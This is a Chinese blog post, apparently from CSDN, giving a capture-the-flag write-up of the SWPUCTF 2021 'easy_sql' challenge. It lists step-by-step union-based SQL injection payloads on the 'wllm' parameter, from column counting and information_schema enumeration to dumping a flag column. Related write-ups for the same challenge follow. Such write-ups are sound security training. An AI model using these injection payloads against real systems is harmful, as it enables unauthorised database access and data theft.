SWPUCTF 2021 新生赛]easy_sql

于 2024-02-19 11:02:44 发布
阅读量399 收藏 8
点赞数 9
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcw_ai_biancheng/article/details/136165052
版权

1.f12打开源代码,发现要求我们传的参数是wllm

2.首先输入?wllm=1,出现以下界面,说明回显正常

输入?wllm=1' ,出现报错,说明为字符型漏洞

分别输入

  ?wllm=1’ order by 3--+

?wllm=1’ order by 4--+

发现不存在4列,存在3列

输入?wllm=-1' union select 1,2,3--+查看回显

输入?wllm=-1' union select 1,2,database()--+

输入?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

查看test_db的表

输入?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

查字段

输入 -1' union select 1,2,group_concat(id,flag) from test_tb--+ 

查看flag的字段,得到密码。

 

马超爱编程
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 685
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[SWPUCTF 2021 新生]easy_sql
最新发布
2301_80593203的博客
02-16 637
1. 是否存在注入并且判断注入类型2. 判断字段数 ' order by 数字 -- '3. 确定回显点 -1 ' union select 1,2 -- '4. 查询数据库信息 @@version @@datadir5. 查询用户名,数据库名 user() database()
2021莲城杯比题包.zip
10-12
2021莲城杯比题包.zip
easy_sound.rar_easy _webcam rtsp
09-24
簡易的聲音設定及取得.可自行取得webcam相關聲音資料.再配合相關rtsp的lib傳送出去.相關設定方式. /dev/dsp webcam 的聲音來源 RATE 頻率 CHANNELS 聲道
easy-to-SQL.rar_easy
09-24
最易入门SQL语句教程,学习SQL语言入门文档,对初学者非常有用。
Easy_draw.rar_easy _easy draw_easydraw
09-24
为编程初学者设计的一个小型图像处理软件
PID_EASY_EXPLAIN.rar_easy _pid
09-24
PID深入浅出的解释,有C语言的例子,值得大家看看。
CTF刷题第一周
qq_62660611的博客
11-10 1478
第一周刷题记录
SWPUCTF 2021 新生 easy_sql
JasonJiao66的博客
01-28 372
当传1‘时出现报错,我们知道这是一个字符型注入,那么接下来还是先把句尾注释掉,然后使用order by语句,从1开始试,到4时开始报错,那么我们知道其有三个字段。首先打开题目,照片左上角求我们赶紧写一点东西,网站标题中则提升我们应该去传一个wllm的值,我们先给杰哥传一个1,回显正常。将1改为-1后,使用union selec,用户名与密码的位置出现了我们注入得到的2与3,表明这两个位置我们可用。接着继续加入limit n,1用group_concat()函数连接到一行显示来对库进行查询。
[SWPUCTF 2021 新生]easy_sql解题记录
2301_80050903的博客
01-25 548
wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+wllm=1' ,出现报错,说明为字符型漏洞。
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
2301_79326813的博客
02-10 871
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
2021 行政城市sql
10-27
2021行政城市sql是指使用结构化查询语言(SQL)对行政城市数据进行查询和分析的操作。在这个过程中,可以利用SQL语句对行政城市的各种属性进行筛选、排序、分组等操作,以满足特定需求。 例如,可以使用SELECT语句从行政城市数据表中选择需要的字段。比如: SELECT 城市名称, 人口数量 FROM 行政城市数据表; 这样可以得到所有城市的名称和人口数量。 另外,可以使用WHERE子句来添加筛选条件,以获取特定条件下的行政城市数据。比如: SELECT 城市名称, 人口数量 FROM 行政城市数据表 WHERE 人口数量 > 10000000; 这样可以得到人口数量大于1000万的城市的名称和人口数量。 还可以使用ORDER BY子句对结果进行排序。比如: SELECT 城市名称, 人口数量 FROM 行政城市数据表 ORDER BY 人口数量 DESC; 这样可以按照人口数量降序排列城市数据。 此外,还可以使用GROUP BY子句对数据进行分组计算。比如: SELECT 地区名称, COUNT(*) as 城市数量 FROM 行政城市数据表 GROUP BY 地区名称; 这样可以统计每个地区的城市数量。 总之,2021行政城市SQL是通过使用结构化查询语言对行政城市数据进行查询、分析和操作的一种技术。通过灵活运用SQL语句,可以方便地对行政城市数据进行各种需求的查询和处理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值